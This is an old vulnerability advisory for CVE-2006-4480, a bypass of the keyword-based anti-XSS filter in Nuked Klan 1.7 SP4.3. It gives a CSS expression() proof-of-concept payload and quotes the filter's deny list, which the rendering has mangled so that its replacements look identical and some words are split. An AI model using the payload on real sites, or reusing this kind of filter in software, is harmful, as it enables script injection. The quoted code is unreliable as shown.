Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

2006.09.02

Credit: Blwood (blwood skynet be)

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-4480

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

// *- BEGIN -*
// By Blwood
// http://blwood.net <http://blwood.net/>
We can bypassed the function anti-xss called nk_CSS ( nuked.php) using
like this :
<b id="blwood" style="width:expression(alert(' http://www.blwood.net'))
<http://www.blwood.net%27%29%29/>"></b>
Here is the function :
function nk_CSS($str)
{
if ($str != "")
{
$str = eregi_replace("content-disposition:","conten
;t-dispositio
n:",$str);
$str = eregi_replace("content-type:","content
-type:",$str);
$str = eregi_replace("content-transfer-encoding:","conte
;nt-transfer-&#
101;ncoding:",$str);
$str = eregi_replace("include","include",$str
);
$str = eregi_replace("<?","<?",$str);
$str = eregi_replace("<?php","<?php",$str);
$str = eregi_replace("?>","?>",$str);
$str = eregi_replace("script","script",$str);
$str = eregi_replace("eval","eval",$str);
$str = eregi_replace("javascript","javascri
;pt",$str);
$str = eregi_replace("embed","embed",$str);
$str = eregi_replace("iframe","iframe",$str);
$str = eregi_replace("refresh", "refresh", $str);
$str = eregi_replace("onload", "onload", $str);
$str = eregi_replace("onstart", "onstart", $str);
$str = eregi_replace("onerror", "onerror", $str);
$str = eregi_replace("onabort", "onabort", $str);
$str = eregi_replace("onblur", "onblur", $str);
$str = eregi_replace("onchange", "onchange", $str);
$str = eregi_replace("onclick", "onclick", $str);
$str = eregi_replace("ondblclick", "ondblclick", $str);
$str = eregi_replace("onfocus", "onfocus", $str);
$str = eregi_replace("onkeydown", "onkeydown", $str);
$str = eregi_replace("onkeypress", "onkeypress", $str);
$str = eregi_replace("onkeyup", "onkeyup", $str);
$str = eregi_replace("onmousedown", "onmousedown", $str);
$str = eregi_replace("onmousemove", "onmousemove", $str);
$str = eregi_replace("onmouseover", "onmouseover", $str);
$str = eregi_replace("onmouseout", "onmouseout", $str);
$str = eregi_replace("onmouseup", "onmouseup", $str);
$str = eregi_replace("onreset", "onreset", $str);
$str = eregi_replace("onselect", "onselect", $str);
$str = eregi_replace("onsubmit", "onsubmit", $str);
$str = eregi_replace("onunload", "onunload", $str);
$str = eregi_replace("document", "document", $str);
$str = eregi_replace("cookie", "cookie", $str);
$str = eregi_replace("vbscript", "vbscript", $str);
$str = eregi_replace("location", "location", $str);
$str = eregi_replace("object", "object", $str);
$str = eregi_replace("vbs", "vbs", $str);
$str = eregi_replace("href", "href", $str);
$str = eregi_replace("src", "src", $str);
}
return($str);
}
// *- END -*

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.